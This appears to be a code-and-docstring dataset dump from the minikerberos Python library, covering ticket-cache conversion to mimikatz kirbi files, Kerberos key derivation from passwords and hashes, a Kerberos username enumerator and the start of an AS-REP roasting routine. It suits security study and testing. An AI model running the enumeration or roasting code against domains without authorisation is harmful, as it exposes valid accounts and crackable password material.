t = self.file_format_version.to_bytes(2, byteorder='big', signed=False)
t_hdr = b''
for header in self.headers:
t_hdr += header.to_bytes()
t += len(t_hdr).to_bytes(2, byteorder='big', signed=False)
t += t_hdr
t += self.primary_principal.to_bytes()
for cred in self.credentials:
t += cred.to_bytes()
return t
def from_kirbifile(kirbi_filename):
kf_abs = os.path.abspath(kirbi_filename)
kirbidata = None
with open(kf_abs, 'rb') as f:
kirbidata = f.read()
return CCACHE.from_kirbi(kirbidata)
def from_kirbidir(directory_path):
"""
Iterates trough all .kirbi files in a given directory and converts all of them into one CCACHE object
"""
cc = CCACHE()
dir_path = os.path.join(os.path.abspath(directory_path), '*.kirbi')
for filename in glob.glob(dir_path):
with open(filename, 'rb') as f:
kirbidata = f.read()
kirbi = KRBCRED.load(kirbidata).native
cc.add_kirbi(kirbi)
return cc
def to_kirbidir(self, directory_path):
"""
Converts all credential object in the CCACHE object to the kirbi file format used by mimikatz.
The kirbi file format supports one credential per file, so prepare for a lot of files being generated.
directory_path: str the directory to write the kirbi files to
"""
kf_abs = os.path.abspath(directory_path)
for cred in self.credentials:
kirbi, filename = cred.to_kirbi()
filename = '%s.kirbi' % filename.replace('..','!')
filepath = os.path.join(kf_abs, filename)
with open(filepath, 'wb') as o:
o.write(kirbi.dump())
def from_file(filename):
"""
Parses the ccache file and returns a CCACHE object
"""
with open(filename, 'rb') as f:
return CCACHE.parse(f)
|
skelsec/minikerberos | minikerberos/common.py | print_table | python | def print_table(lines, separate_head=True):
#Count the column width
widths = []
for line in lines:
for i,size in enumerate([len(x) for x in line]):
while i >= len(widths):
widths.append(0)
if size > widths[i]:
widths[i] = size
#Generate the format string to pad the columns
print_string = ""
for i,width in enumerate(widths):
print_string += "{" + str(i) + ":" + str(width) + "} | "
if (len(print_string) == 0):
return
print_string = print_string[:-3]
#Print the actual data
for i,line in enumerate(lines):
print(print_string.format(*line))
if (i == 0 and separate_head):
print("-"*(sum(widths)+3*(len(widths)-1))) | Prints a formatted table given a 2 dimensional array | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/common.py#L246-L269 | null | #!/usr/bin/env python3
#
# Author:
# Tamas Jos (@skelsec)
#
import secrets
import hashlib
import collections
from minikerberos.constants import *
from minikerberos.encryption import string_to_key, Enctype
from minikerberos.ccache import CCACHE
class KerberosSecretType(enum.Enum):
PASSWORD = 'PASSWORD'
PW = 'PW'
PASS = 'PASS'
NT = 'NT'
AES = 'AES'
RC4 = 'RC4'
DES = 'DES'
DES3 = 'DES3'
TDES = 'TDES'
CCACHE = 'CCACHE'
class KerberosCredential:
def __init__(self):
self.username = None
self.domain = None
self.password = None
self.nt_hash = None
self.lm_hash = None
self.kerberos_key_aes_256 = None
self.kerberos_key_aes_128 = None
self.kerberos_key_des = None
self.kerberos_key_rc4 = None
self.kerberos_key_des3 = None
self.ccache = None
def get_preferred_enctype(self, server_enctypes):
client_enctypes = self.get_supported_enctypes(as_int=False)
common_enctypes = list(set([s_enctype for s_enctype in server_enctypes]) & set(client_enctypes))
for c_enctype in client_enctypes:
if c_enctype in common_enctypes:
return c_enctype
raise Exception('No common supported enctypes! Server: %s Client: %s' % (
', '.join([s_enctype.name for s_enctype in server_enctypes]),
', '.join([c_enctype.name for c_enctype in client_enctypes])
)
)
def get_key_for_enctype(self, etype):
"""
Returns the encryption key bytes for the enctryption type.
"""
if etype == EncryptionType.AES256_CTS_HMAC_SHA1_96:
if self.kerberos_key_aes_256:
return bytes.fromhex(self.kerberos_key_aes_256)
if self.password is not None:
salt = (self.domain.upper() + self.username).encode()
return string_to_key(Enctype.AES256, self.password.encode(), salt).contents
raise Exception('There is no key for AES256 encryption')
elif etype == EncryptionType.AES128_CTS_HMAC_SHA1_96:
if self.kerberos_key_aes_128:
return bytes.fromhex(self.kerberos_key_aes_128)
if self.password is not None:
salt = (self.domain.upper() + self.username).encode()
return string_to_key(Enctype.AES128, self.password.encode(), salt).contents
raise Exception('There is no key for AES128 encryption')
elif etype == EncryptionType.ARCFOUR_HMAC_MD5:
if self.kerberos_key_rc4:
return bytes.fromhex(self.kerberos_key_rc4)
if self.nt_hash:
return bytes.fromhex(self.nt_hash)
elif self.password:
self.nt_hash = hashlib.new('md4', self.password.encode('utf-16-le')).hexdigest().upper()
return bytes.fromhex(self.nt_hash)
else:
raise Exception('There is no key for RC4 encryption')
elif etype == EncryptionType.DES3_CBC_SHA1:
if self.kerberos_key_des3:
return bytes.fromhex(self.kerberos_key_des)
elif self.password:
salt = (self.domain.upper() + self.username).encode()
return string_to_key(Enctype.DES3, self.password.encode(), salt).contents
else:
raise Exception('There is no key for DES3 encryption')
elif etype == EncryptionType.DES_CBC_MD5: #etype == EncryptionType.DES_CBC_CRC or etype == EncryptionType.DES_CBC_MD4 or
if self.kerberos_key_des:
return bytes.fromhex(self.kerberos_key_des)
elif self.password:
salt = (self.domain.upper() + self.username).encode()
return string_to_key(Enctype.DES_MD5, self.password.encode(), salt).contents
else:
raise Exception('There is no key for DES3 encryption')
else:
raise Exception('Unsupported encryption type: %s' % etype.name)
def get_supported_enctypes(self, as_int = True):
supp_enctypes = collections.OrderedDict()
if self.kerberos_key_aes_256:
supp_enctypes[EncryptionType.AES256_CTS_HMAC_SHA1_96] = 1
if self.kerberos_key_aes_128:
supp_enctypes[EncryptionType.AES128_CTS_HMAC_SHA1_96] = 1
if self.password:
supp_enctypes[EncryptionType.DES_CBC_CRC] = 1
supp_enctypes[EncryptionType.DES_CBC_MD4] = 1
supp_enctypes[EncryptionType.DES_CBC_MD5] = 1
supp_enctypes[EncryptionType.DES3_CBC_SHA1] = 1
supp_enctypes[EncryptionType.ARCFOUR_HMAC_MD5] = 1
supp_enctypes[EncryptionType.AES256_CTS_HMAC_SHA1_96] = 1
supp_enctypes[EncryptionType.AES128_CTS_HMAC_SHA1_96] = 1
if self.password or self.nt_hash or self.kerberos_key_rc4:
supp_enctypes[EncryptionType.ARCFOUR_HMAC_MD5] = 1
if self.kerberos_key_des:
supp_enctypes[EncryptionType.DES3_CBC_SHA1] = 1
if as_int == True:
return [etype.value for etype in supp_enctypes]
return [etype for etype in supp_enctypes]
@staticmethod
def add_args(parser):
group = parser.add_argument_group('authentication')
group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file '
'(KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use'
' the ones specified in the command line')
group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication'
' (128 or 256 bits)')
@staticmethod
def from_args(args):
cred = KerberosCredential()
cred.from_target_string(args.target)
if args.hashes is not None:
cred.lm_hash, cred.nt_hash = args.hashes.split(':')
if args.aesKey is not None:
try:
bytes.fromhex(args.aesKey)
except Exception as e:
logging.exception('Kerberos AES key format incorrect!')
t = len(args.aesKey)
if t == 64:
cred.kerberos_key_aes_256 = args.aesKey.lower()
elif t == 32:
cred.kerberos_key_aes_128 = args.aesKey.lower()
else:
raise Exception('Kerberos AES key length incorrect!')
if args.k is True:
if cred.has_kerberos_secret() == False:
raise Exception('Trying to perform Kerberos authentication with no usable kerberos secrets!')
cred.force_kerberos = True
if args.no_pass == False and cred.has_secret() == False:
cred.password = getpass.getpass()
return cred
@staticmethod
def from_connection_string(s):
"""
Credential input format:
<domain>/<username>/<secret_type>:<secret>@<dc_ip_or_hostname>
"""
cred = KerberosCredential()
cred.domain, t = s.split('/', 1)
cred.username, t = t.split('/', 1)
secret_type, t = t.split(':', 1)
secret, target = t.rsplit('@', 1)
st = KerberosSecretType(secret_type.upper())
if st == KerberosSecretType.PASSWORD or st == KerberosSecretType.PW or st == KerberosSecretType.PASS:
cred.password = secret
elif st == KerberosSecretType.NT or st == KerberosSecretType.RC4:
cred.nt_hash = secret
cred.kerberos_key_rc4 = secret
elif st == KerberosSecretType.AES:
cred.kerberos_key_aes_256 = secret
cred.kerberos_key_aes_128 = secret
elif st == KerberosSecretType.DES:
cred.kerberos_key_des = secret
elif st == KerberosSecretType.DES3 or st == KerberosSecretType.TDES:
cred.kerberos_key_des3 = secret
elif st == KerberosSecretType.CCACHE:
cred.ccache = CCACHE.from_file(secret)
return cred
def __str__(self):
t = '===KerberosCredential===\r\n'
t += 'username: %s\r\n' % self.username
t += 'domain: %s\r\n' % self.domain
t += 'password: %s\r\n' % self.password
t += 'nt_hash: %s\r\n' % self.nt_hash
t += 'lm_hash: %s\r\n' % self.lm_hash
if self.kerberos_key_aes_256:
t += 'kerberos_key_aes_256: %s\r\n' % self.kerberos_key_aes_256
if self.kerberos_key_aes_128:
t += 'kerberos_key_aes_128: %s\r\n' % self.kerberos_key_aes_128
if self.kerberos_key_des:
t += 'kerberos_key_des: %s\r\n' % self.kerberos_key_des
if self.kerberos_key_rc4:
t += 'kerberos_key_rc4: %s\r\n' % self.kerberos_key_rc4
if self.kerberos_key_des3:
t += 'kerberos_key_des3: %s\r\n' % self.kerberos_key_des3
return t
class KerberosTarget:
def __init__(self):
self.username = None
self.service = None #the service we are trying to get a ticket for (eg. cifs/mssql...)
self.domain = None #the kerberos realm
def get_principalname(self):
if self.service:
return [self.service, self.username]
return [self.username]
def get_formatted_pname(self):
if self.service:
return '%s/%s@%s' % (self.service, self.username, self.domain)
return '%s@%s' % (self.username, self.domain)
def print_table(lines, separate_head=True):
"""Prints a formatted table given a 2 dimensional array"""
#Count the column width
widths = []
for line in lines:
for i,size in enumerate([len(x) for x in line]):
while i >= len(widths):
widths.append(0)
if size > widths[i]:
widths[i] = size
#Generate the format string to pad the columns
print_string = ""
for i,width in enumerate(widths):
print_string += "{" + str(i) + ":" + str(width) + "} | "
if (len(print_string) == 0):
return
print_string = print_string[:-3]
#Print the actual data
for i,line in enumerate(lines):
print(print_string.format(*line))
if (i == 0 and separate_head):
print("-"*(sum(widths)+3*(len(widths)-1)))
|
skelsec/minikerberos | minikerberos/common.py | KerberosCredential.get_key_for_enctype | python | def get_key_for_enctype(self, etype):
if etype == EncryptionType.AES256_CTS_HMAC_SHA1_96:
if self.kerberos_key_aes_256:
return bytes.fromhex(self.kerberos_key_aes_256)
if self.password is not None:
salt = (self.domain.upper() + self.username).encode()
return string_to_key(Enctype.AES256, self.password.encode(), salt).contents
raise Exception('There is no key for AES256 encryption')
elif etype == EncryptionType.AES128_CTS_HMAC_SHA1_96:
if self.kerberos_key_aes_128:
return bytes.fromhex(self.kerberos_key_aes_128)
if self.password is not None:
salt = (self.domain.upper() + self.username).encode()
return string_to_key(Enctype.AES128, self.password.encode(), salt).contents
raise Exception('There is no key for AES128 encryption')
elif etype == EncryptionType.ARCFOUR_HMAC_MD5:
if self.kerberos_key_rc4:
return bytes.fromhex(self.kerberos_key_rc4)
if self.nt_hash:
return bytes.fromhex(self.nt_hash)
elif self.password:
self.nt_hash = hashlib.new('md4', self.password.encode('utf-16-le')).hexdigest().upper()
return bytes.fromhex(self.nt_hash)
else:
raise Exception('There is no key for RC4 encryption')
elif etype == EncryptionType.DES3_CBC_SHA1:
if self.kerberos_key_des3:
return bytes.fromhex(self.kerberos_key_des)
elif self.password:
salt = (self.domain.upper() + self.username).encode()
return string_to_key(Enctype.DES3, self.password.encode(), salt).contents
else:
raise Exception('There is no key for DES3 encryption')
elif etype == EncryptionType.DES_CBC_MD5: #etype == EncryptionType.DES_CBC_CRC or etype == EncryptionType.DES_CBC_MD4 or
if self.kerberos_key_des:
return bytes.fromhex(self.kerberos_key_des)
elif self.password:
salt = (self.domain.upper() + self.username).encode()
return string_to_key(Enctype.DES_MD5, self.password.encode(), salt).contents
else:
raise Exception('There is no key for DES3 encryption')
else:
raise Exception('Unsupported encryption type: %s' % etype.name) | Returns the encryption key bytes for the enctryption type. | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/common.py#L54-L101 | [
"def string_to_key(enctype, string, salt, params=None):\n\te = _get_enctype_profile(enctype)\n\treturn e.string_to_key(string, salt, params)\n"
] | class KerberosCredential:
def __init__(self):
self.username = None
self.domain = None
self.password = None
self.nt_hash = None
self.lm_hash = None
self.kerberos_key_aes_256 = None
self.kerberos_key_aes_128 = None
self.kerberos_key_des = None
self.kerberos_key_rc4 = None
self.kerberos_key_des3 = None
self.ccache = None
def get_preferred_enctype(self, server_enctypes):
client_enctypes = self.get_supported_enctypes(as_int=False)
common_enctypes = list(set([s_enctype for s_enctype in server_enctypes]) & set(client_enctypes))
for c_enctype in client_enctypes:
if c_enctype in common_enctypes:
return c_enctype
raise Exception('No common supported enctypes! Server: %s Client: %s' % (
', '.join([s_enctype.name for s_enctype in server_enctypes]),
', '.join([c_enctype.name for c_enctype in client_enctypes])
)
)
def get_key_for_enctype(self, etype):
"""
Returns the encryption key bytes for the enctryption type.
"""
if etype == EncryptionType.AES256_CTS_HMAC_SHA1_96:
if self.kerberos_key_aes_256:
return bytes.fromhex(self.kerberos_key_aes_256)
if self.password is not None:
salt = (self.domain.upper() + self.username).encode()
return string_to_key(Enctype.AES256, self.password.encode(), salt).contents
raise Exception('There is no key for AES256 encryption')
elif etype == EncryptionType.AES128_CTS_HMAC_SHA1_96:
if self.kerberos_key_aes_128:
return bytes.fromhex(self.kerberos_key_aes_128)
if self.password is not None:
salt = (self.domain.upper() + self.username).encode()
return string_to_key(Enctype.AES128, self.password.encode(), salt).contents
raise Exception('There is no key for AES128 encryption')
elif etype == EncryptionType.ARCFOUR_HMAC_MD5:
if self.kerberos_key_rc4:
return bytes.fromhex(self.kerberos_key_rc4)
if self.nt_hash:
return bytes.fromhex(self.nt_hash)
elif self.password:
self.nt_hash = hashlib.new('md4', self.password.encode('utf-16-le')).hexdigest().upper()
return bytes.fromhex(self.nt_hash)
else:
raise Exception('There is no key for RC4 encryption')
elif etype == EncryptionType.DES3_CBC_SHA1:
if self.kerberos_key_des3:
return bytes.fromhex(self.kerberos_key_des)
elif self.password:
salt = (self.domain.upper() + self.username).encode()
return string_to_key(Enctype.DES3, self.password.encode(), salt).contents
else:
raise Exception('There is no key for DES3 encryption')
elif etype == EncryptionType.DES_CBC_MD5: #etype == EncryptionType.DES_CBC_CRC or etype == EncryptionType.DES_CBC_MD4 or
if self.kerberos_key_des:
return bytes.fromhex(self.kerberos_key_des)
elif self.password:
salt = (self.domain.upper() + self.username).encode()
return string_to_key(Enctype.DES_MD5, self.password.encode(), salt).contents
else:
raise Exception('There is no key for DES3 encryption')
else:
raise Exception('Unsupported encryption type: %s' % etype.name)
def get_supported_enctypes(self, as_int = True):
supp_enctypes = collections.OrderedDict()
if self.kerberos_key_aes_256:
supp_enctypes[EncryptionType.AES256_CTS_HMAC_SHA1_96] = 1
if self.kerberos_key_aes_128:
supp_enctypes[EncryptionType.AES128_CTS_HMAC_SHA1_96] = 1
if self.password:
supp_enctypes[EncryptionType.DES_CBC_CRC] = 1
supp_enctypes[EncryptionType.DES_CBC_MD4] = 1
supp_enctypes[EncryptionType.DES_CBC_MD5] = 1
supp_enctypes[EncryptionType.DES3_CBC_SHA1] = 1
supp_enctypes[EncryptionType.ARCFOUR_HMAC_MD5] = 1
supp_enctypes[EncryptionType.AES256_CTS_HMAC_SHA1_96] = 1
supp_enctypes[EncryptionType.AES128_CTS_HMAC_SHA1_96] = 1
if self.password or self.nt_hash or self.kerberos_key_rc4:
supp_enctypes[EncryptionType.ARCFOUR_HMAC_MD5] = 1
if self.kerberos_key_des:
supp_enctypes[EncryptionType.DES3_CBC_SHA1] = 1
if as_int == True:
return [etype.value for etype in supp_enctypes]
return [etype for etype in supp_enctypes]
@staticmethod
def add_args(parser):
group = parser.add_argument_group('authentication')
group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file '
'(KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use'
' the ones specified in the command line')
group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication'
' (128 or 256 bits)')
@staticmethod
def from_args(args):
cred = KerberosCredential()
cred.from_target_string(args.target)
if args.hashes is not None:
cred.lm_hash, cred.nt_hash = args.hashes.split(':')
if args.aesKey is not None:
try:
bytes.fromhex(args.aesKey)
except Exception as e:
logging.exception('Kerberos AES key format incorrect!')
t = len(args.aesKey)
if t == 64:
cred.kerberos_key_aes_256 = args.aesKey.lower()
elif t == 32:
cred.kerberos_key_aes_128 = args.aesKey.lower()
else:
raise Exception('Kerberos AES key length incorrect!')
if args.k is True:
if cred.has_kerberos_secret() == False:
raise Exception('Trying to perform Kerberos authentication with no usable kerberos secrets!')
cred.force_kerberos = True
if args.no_pass == False and cred.has_secret() == False:
cred.password = getpass.getpass()
return cred
@staticmethod
def from_connection_string(s):
"""
Credential input format:
<domain>/<username>/<secret_type>:<secret>@<dc_ip_or_hostname>
"""
cred = KerberosCredential()
cred.domain, t = s.split('/', 1)
cred.username, t = t.split('/', 1)
secret_type, t = t.split(':', 1)
secret, target = t.rsplit('@', 1)
st = KerberosSecretType(secret_type.upper())
if st == KerberosSecretType.PASSWORD or st == KerberosSecretType.PW or st == KerberosSecretType.PASS:
cred.password = secret
elif st == KerberosSecretType.NT or st == KerberosSecretType.RC4:
cred.nt_hash = secret
cred.kerberos_key_rc4 = secret
elif st == KerberosSecretType.AES:
cred.kerberos_key_aes_256 = secret
cred.kerberos_key_aes_128 = secret
elif st == KerberosSecretType.DES:
cred.kerberos_key_des = secret
elif st == KerberosSecretType.DES3 or st == KerberosSecretType.TDES:
cred.kerberos_key_des3 = secret
elif st == KerberosSecretType.CCACHE:
cred.ccache = CCACHE.from_file(secret)
return cred
def __str__(self):
t = '===KerberosCredential===\r\n'
t += 'username: %s\r\n' % self.username
t += 'domain: %s\r\n' % self.domain
t += 'password: %s\r\n' % self.password
t += 'nt_hash: %s\r\n' % self.nt_hash
t += 'lm_hash: %s\r\n' % self.lm_hash
if self.kerberos_key_aes_256:
t += 'kerberos_key_aes_256: %s\r\n' % self.kerberos_key_aes_256
if self.kerberos_key_aes_128:
t += 'kerberos_key_aes_128: %s\r\n' % self.kerberos_key_aes_128
if self.kerberos_key_des:
t += 'kerberos_key_des: %s\r\n' % self.kerberos_key_des
if self.kerberos_key_rc4:
t += 'kerberos_key_rc4: %s\r\n' % self.kerberos_key_rc4
if self.kerberos_key_des3:
t += 'kerberos_key_des3: %s\r\n' % self.kerberos_key_des3
return t
|
skelsec/minikerberos | minikerberos/common.py | KerberosCredential.from_connection_string | python | def from_connection_string(s):
cred = KerberosCredential()
cred.domain, t = s.split('/', 1)
cred.username, t = t.split('/', 1)
secret_type, t = t.split(':', 1)
secret, target = t.rsplit('@', 1)
st = KerberosSecretType(secret_type.upper())
if st == KerberosSecretType.PASSWORD or st == KerberosSecretType.PW or st == KerberosSecretType.PASS:
cred.password = secret
elif st == KerberosSecretType.NT or st == KerberosSecretType.RC4:
cred.nt_hash = secret
cred.kerberos_key_rc4 = secret
elif st == KerberosSecretType.AES:
cred.kerberos_key_aes_256 = secret
cred.kerberos_key_aes_128 = secret
elif st == KerberosSecretType.DES:
cred.kerberos_key_des = secret
elif st == KerberosSecretType.DES3 or st == KerberosSecretType.TDES:
cred.kerberos_key_des3 = secret
elif st == KerberosSecretType.CCACHE:
cred.ccache = CCACHE.from_file(secret)
return cred | Credential input format:
<domain>/<username>/<secret_type>:<secret>@<dc_ip_or_hostname> | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/common.py#L174-L208 | null | class KerberosCredential:
def __init__(self):
self.username = None
self.domain = None
self.password = None
self.nt_hash = None
self.lm_hash = None
self.kerberos_key_aes_256 = None
self.kerberos_key_aes_128 = None
self.kerberos_key_des = None
self.kerberos_key_rc4 = None
self.kerberos_key_des3 = None
self.ccache = None
def get_preferred_enctype(self, server_enctypes):
client_enctypes = self.get_supported_enctypes(as_int=False)
common_enctypes = list(set([s_enctype for s_enctype in server_enctypes]) & set(client_enctypes))
for c_enctype in client_enctypes:
if c_enctype in common_enctypes:
return c_enctype
raise Exception('No common supported enctypes! Server: %s Client: %s' % (
', '.join([s_enctype.name for s_enctype in server_enctypes]),
', '.join([c_enctype.name for c_enctype in client_enctypes])
)
)
def get_key_for_enctype(self, etype):
"""
Returns the encryption key bytes for the enctryption type.
"""
if etype == EncryptionType.AES256_CTS_HMAC_SHA1_96:
if self.kerberos_key_aes_256:
return bytes.fromhex(self.kerberos_key_aes_256)
if self.password is not None:
salt = (self.domain.upper() + self.username).encode()
return string_to_key(Enctype.AES256, self.password.encode(), salt).contents
raise Exception('There is no key for AES256 encryption')
elif etype == EncryptionType.AES128_CTS_HMAC_SHA1_96:
if self.kerberos_key_aes_128:
return bytes.fromhex(self.kerberos_key_aes_128)
if self.password is not None:
salt = (self.domain.upper() + self.username).encode()
return string_to_key(Enctype.AES128, self.password.encode(), salt).contents
raise Exception('There is no key for AES128 encryption')
elif etype == EncryptionType.ARCFOUR_HMAC_MD5:
if self.kerberos_key_rc4:
return bytes.fromhex(self.kerberos_key_rc4)
if self.nt_hash:
return bytes.fromhex(self.nt_hash)
elif self.password:
self.nt_hash = hashlib.new('md4', self.password.encode('utf-16-le')).hexdigest().upper()
return bytes.fromhex(self.nt_hash)
else:
raise Exception('There is no key for RC4 encryption')
elif etype == EncryptionType.DES3_CBC_SHA1:
if self.kerberos_key_des3:
return bytes.fromhex(self.kerberos_key_des)
elif self.password:
salt = (self.domain.upper() + self.username).encode()
return string_to_key(Enctype.DES3, self.password.encode(), salt).contents
else:
raise Exception('There is no key for DES3 encryption')
elif etype == EncryptionType.DES_CBC_MD5: #etype == EncryptionType.DES_CBC_CRC or etype == EncryptionType.DES_CBC_MD4 or
if self.kerberos_key_des:
return bytes.fromhex(self.kerberos_key_des)
elif self.password:
salt = (self.domain.upper() + self.username).encode()
return string_to_key(Enctype.DES_MD5, self.password.encode(), salt).contents
else:
raise Exception('There is no key for DES3 encryption')
else:
raise Exception('Unsupported encryption type: %s' % etype.name)
def get_supported_enctypes(self, as_int = True):
supp_enctypes = collections.OrderedDict()
if self.kerberos_key_aes_256:
supp_enctypes[EncryptionType.AES256_CTS_HMAC_SHA1_96] = 1
if self.kerberos_key_aes_128:
supp_enctypes[EncryptionType.AES128_CTS_HMAC_SHA1_96] = 1
if self.password:
supp_enctypes[EncryptionType.DES_CBC_CRC] = 1
supp_enctypes[EncryptionType.DES_CBC_MD4] = 1
supp_enctypes[EncryptionType.DES_CBC_MD5] = 1
supp_enctypes[EncryptionType.DES3_CBC_SHA1] = 1
supp_enctypes[EncryptionType.ARCFOUR_HMAC_MD5] = 1
supp_enctypes[EncryptionType.AES256_CTS_HMAC_SHA1_96] = 1
supp_enctypes[EncryptionType.AES128_CTS_HMAC_SHA1_96] = 1
if self.password or self.nt_hash or self.kerberos_key_rc4:
supp_enctypes[EncryptionType.ARCFOUR_HMAC_MD5] = 1
if self.kerberos_key_des:
supp_enctypes[EncryptionType.DES3_CBC_SHA1] = 1
if as_int == True:
return [etype.value for etype in supp_enctypes]
return [etype for etype in supp_enctypes]
@staticmethod
def add_args(parser):
group = parser.add_argument_group('authentication')
group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file '
'(KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use'
' the ones specified in the command line')
group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication'
' (128 or 256 bits)')
@staticmethod
def from_args(args):
cred = KerberosCredential()
cred.from_target_string(args.target)
if args.hashes is not None:
cred.lm_hash, cred.nt_hash = args.hashes.split(':')
if args.aesKey is not None:
try:
bytes.fromhex(args.aesKey)
except Exception as e:
logging.exception('Kerberos AES key format incorrect!')
t = len(args.aesKey)
if t == 64:
cred.kerberos_key_aes_256 = args.aesKey.lower()
elif t == 32:
cred.kerberos_key_aes_128 = args.aesKey.lower()
else:
raise Exception('Kerberos AES key length incorrect!')
if args.k is True:
if cred.has_kerberos_secret() == False:
raise Exception('Trying to perform Kerberos authentication with no usable kerberos secrets!')
cred.force_kerberos = True
if args.no_pass == False and cred.has_secret() == False:
cred.password = getpass.getpass()
return cred
@staticmethod
def from_connection_string(s):
"""
Credential input format:
<domain>/<username>/<secret_type>:<secret>@<dc_ip_or_hostname>
"""
cred = KerberosCredential()
cred.domain, t = s.split('/', 1)
cred.username, t = t.split('/', 1)
secret_type, t = t.split(':', 1)
secret, target = t.rsplit('@', 1)
st = KerberosSecretType(secret_type.upper())
if st == KerberosSecretType.PASSWORD or st == KerberosSecretType.PW or st == KerberosSecretType.PASS:
cred.password = secret
elif st == KerberosSecretType.NT or st == KerberosSecretType.RC4:
cred.nt_hash = secret
cred.kerberos_key_rc4 = secret
elif st == KerberosSecretType.AES:
cred.kerberos_key_aes_256 = secret
cred.kerberos_key_aes_128 = secret
elif st == KerberosSecretType.DES:
cred.kerberos_key_des = secret
elif st == KerberosSecretType.DES3 or st == KerberosSecretType.TDES:
cred.kerberos_key_des3 = secret
elif st == KerberosSecretType.CCACHE:
cred.ccache = CCACHE.from_file(secret)
return cred
def __str__(self):
t = '===KerberosCredential===\r\n'
t += 'username: %s\r\n' % self.username
t += 'domain: %s\r\n' % self.domain
t += 'password: %s\r\n' % self.password
t += 'nt_hash: %s\r\n' % self.nt_hash
t += 'lm_hash: %s\r\n' % self.lm_hash
if self.kerberos_key_aes_256:
t += 'kerberos_key_aes_256: %s\r\n' % self.kerberos_key_aes_256
if self.kerberos_key_aes_128:
t += 'kerberos_key_aes_128: %s\r\n' % self.kerberos_key_aes_128
if self.kerberos_key_des:
t += 'kerberos_key_des: %s\r\n' % self.kerberos_key_des
if self.kerberos_key_rc4:
t += 'kerberos_key_rc4: %s\r\n' % self.kerberos_key_rc4
if self.kerberos_key_des3:
t += 'kerberos_key_des3: %s\r\n' % self.kerberos_key_des3
return t
|
skelsec/minikerberos | minikerberos/security.py | KerberosUserEnum.run | python | def run(self, realm, users):
existing_users = []
for user in users:
logging.debug('Probing user %s' % user)
req = KerberosUserEnum.construct_tgt_req(realm, user)
rep = self.ksoc.sendrecv(req.dump(), throw = False)
if rep.name != 'KRB_ERROR':
# user doesnt need preauth, but it exists
existing_users.append(user)
elif rep.native['error-code'] != KerberosErrorCode.KDC_ERR_PREAUTH_REQUIRED.value:
# any other error means user doesnt exist
continue
else:
# preauth needed, only if user exists
existing_users.append(user)
return existing_users | Requests a TGT in the name of the users specified in users.
Returns a list of usernames that are in the domain.
realm: kerberos realm (domain name of the corp)
users: list : list of usernames to test | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/security.py#L43-L69 | [
"def construct_tgt_req(realm, username):\n\tnow = datetime.datetime.utcnow()\n\tkdc_req_body = {}\n\tkdc_req_body['kdc-options'] = KDCOptions(set(['forwardable','renewable','proxiable']))\n\tkdc_req_body['cname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': [username]})\n\tkdc_req_body['r... | class KerberosUserEnum:
def __init__(self, ksoc):
self.ksoc = ksoc
def construct_tgt_req(realm, username):
now = datetime.datetime.utcnow()
kdc_req_body = {}
kdc_req_body['kdc-options'] = KDCOptions(set(['forwardable','renewable','proxiable']))
kdc_req_body['cname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': [username]})
kdc_req_body['realm'] = realm.upper()
kdc_req_body['sname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': ['krbtgt', realm.upper()]})
kdc_req_body['till'] = now + datetime.timedelta(days=1)
kdc_req_body['rtime'] = now + datetime.timedelta(days=1)
kdc_req_body['nonce'] = secrets.randbits(31)
kdc_req_body['etype'] = [2, 3, 16, 23, 17, 18] #we "support" all MS related enctypes
pa_data_1 = {}
pa_data_1['padata-type'] = int(PADATA_TYPE('PA-PAC-REQUEST'))
pa_data_1['padata-value'] = PA_PAC_REQUEST({'include-pac': True}).dump()
kdc_req = {}
kdc_req['pvno'] = krb5_pvno
kdc_req['msg-type'] = MESSAGE_TYPE.KRB_AS_REQ.value
kdc_req['padata'] = [pa_data_1]
kdc_req['req-body'] = KDC_REQ_BODY(kdc_req_body)
return AS_REQ(kdc_req)
def run(self, realm, users):
"""
Requests a TGT in the name of the users specified in users.
Returns a list of usernames that are in the domain.
realm: kerberos realm (domain name of the corp)
users: list : list of usernames to test
"""
existing_users = []
for user in users:
logging.debug('Probing user %s' % user)
req = KerberosUserEnum.construct_tgt_req(realm, user)
rep = self.ksoc.sendrecv(req.dump(), throw = False)
if rep.name != 'KRB_ERROR':
# user doesnt need preauth, but it exists
existing_users.append(user)
elif rep.native['error-code'] != KerberosErrorCode.KDC_ERR_PREAUTH_REQUIRED.value:
# any other error means user doesnt exist
continue
else:
# preauth needed, only if user exists
existing_users.append(user)
return existing_users
|
skelsec/minikerberos | minikerberos/security.py | APREPRoast.run | python | def run(self, creds, override_etype = [23]):
"""
Requests TGT tickets for all users specified in the targets list
creds: list : the users to request the TGT tickets for
override_etype: list : list of supported encryption types
"""
tgts = []
for cred in creds:
try:
kcomm = KerbrosComm(cred, self.ksoc)
